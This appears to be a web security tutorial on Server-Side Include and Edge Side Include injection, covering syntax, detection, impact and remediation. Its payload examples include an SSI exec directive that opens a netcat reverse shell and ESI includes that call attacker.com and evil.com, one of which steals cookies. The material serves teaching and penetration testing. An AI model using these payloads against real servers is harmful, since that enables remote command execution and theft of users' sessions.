Server Side Includes (SSI) & Edge Side Includes (ESI)

Directives

In programming, directives are instructions or commands embedded within the code that provide guidance to the compiler or interpreter on how to process the code.

Server-Side Includes (SSI)

Is a technology used by web applications to create dynamic content on HTML pages before loading or during the rendering process by evaluating SSI directives.

SSI is a great way to add small amounts of dynamic content to pages, without doing a lot of extra work.

SSI used to:

• display the size of a file.
• display the date last modified of the current document.
• include files and display its content.

Some SSI directives:

<!--#directive param="value" -->

// Document name
<!--#echo var="DOCUMENT_NAME" -->
// Date
<!--#echo var="DATE_LOCAL" -->

// File inclusion
<!--#include virtual="/index.html" -->
// Including files (same directory)
<!--#include file="file_to_include.html" -->
// CGI Program results
<!--#include virtual="/cgi-bin/counter.pl" -->
// Including virtual files (same directory)
<!--#include virtual="file_to_include.html" -->
// Modification date of a file
<!--#flastmod file="index.html" -->

// Command exec
<!--#exec cmd="dir" -->
// Command exec
<!--#exec cmd="ls" -->
// Reverse shell
<!--#exec cmd="mkfifo /tmp/foo;nc <PENTESTER IP> <PORT> 0</tmp/foo|/bin/bash 1>/tmp/foo;rm /tmp/foo" -->

// Print all variables
<!--#printenv -->
// Setting variables
<!--#set var="name" value="Rich" -->

SSI injection

Description:

Occurs when poorly validated user input manages to become part of a response that is parsed for Server-Side Include directives.

Attack scenarios:

Check for extensions such as .shtml, .shtm, or .stm) ...etc.

Note: it can exist in blind format.

• Submit payloads to the target application through input fields:
• The web server vulnerable if it parses and executes the directives before rendering the page.

Impact:

Can lead to extracting sensitive information from local files or even executing commands on the target web server.

Test plan: Injecting some SSI directives:

• Date:

<!--#echo var="DATE_LOCAL" -->

Result

• Executing commands such as getting the current directory path:

<!--#exec cmd="pwd" -->

Result

Remediation

Ideally, a whitelist of specific accepted values should be used. Otherwise, only short alphanumeric strings should be accepted.

Edge Side Includes (ESI)

Is an XML-based tag-based markup language that relieves server performance by caching large amounts of web content and is mainly used in popular HTTP proxy solutions.

• The ESI tag is used to instruct the reverse proxy (caching server) to get more information about the web page of the template that has been cached.
• Allow for dynamic web content assembly at the edge of the network (Content Delivery Network, User’s Browser, or Reverse Proxy).

The syntax of ESI in an example:

<body>
  <b>The Weather Website</b>
  Weather for <esi:include src="/weather/name?id=$(QUERY_STRING{city_id})" />
  Monday: <esi:include src="/weather/week/monday?id=$(QUERY_STRING{city_id})" />
  Tuesday: <esi:include src="/weather/week/tuesday?id=$(QUERY_STRING{city_id})" />
[…]

ESI Injection

Description:

The root cause of this vulnerability is that HTTP surrogates cannot validate the ESI tag origin.

- Occurs when an attacker manages to reflect malicious ESI tags in the HTTP Response.

Attack scenarios:

- Inspecting response headers in search for Surrogate-Control: content=”ESI/1.0"
- we can introduce ESI tags to HTTP requests to see if any intermediary proxy is parsing the request and if ESI Injection is possible.

- Note: it can be blind.

A blind exploitation approach:

// Basic detection
hell<!--esi-->o 
// If previous is reflected as "hello", it's vulnerable

// Blind detection
<esi:include src=http://attacker.com>

// XSS Exploitation Example
<esi:include src=http://attacker.com/XSSPAYLOAD.html>

// Cookie Stealer (bypass httpOnly flag)
<esi:include src=http://attacker.com/?cookie_stealer.php?=$(HTTP_COOKIE)>

// Introduce private local files (Not LFI per se)
<esi:include src="supersecret.txt">

// Valid for Akamai, sends debug information in the response
<esi:debug/>

1. Server Request Forgery (SSRF)

<esi:include src="http://evil.com/ping/" />

If you can get an HTTP callback, then there is ESI injection in this proxy server.

2. SSRF-to-XSS attack using ESI include

<esi:include src=http://attacker.com/xss.html>

• When include is available, they can be pointed to external domains, and an external page with XSS payload can be simply included.
• The content of the xss.html page is obtained by SSRF, and then the payload is added to the dom of the returned page, causing XSS attacks.

GoSecure created a table to understand possible attacks that we can try against different ESI-capable software, depending on the functionality supported:

Remediation

Apply context-dependent encoding and/or validation to user input rendered on a page. Mitigation techniques against XSS recommended for the language or framework you are using will often be enough to protect against ESI injections.

Resources

• Beyond XSS: Edge Side Include Injection — GoSecure
• ESI (Edge Side Include) Injection Technology — Security Customer — Security Information Platform (anquanke.com)
• Server-Side Includes (SSI) Injection | OWASP Foundation
• Server Side Inclusion/Edge Side Inclusion Injection | HackTricks | HackTricks

Thanks.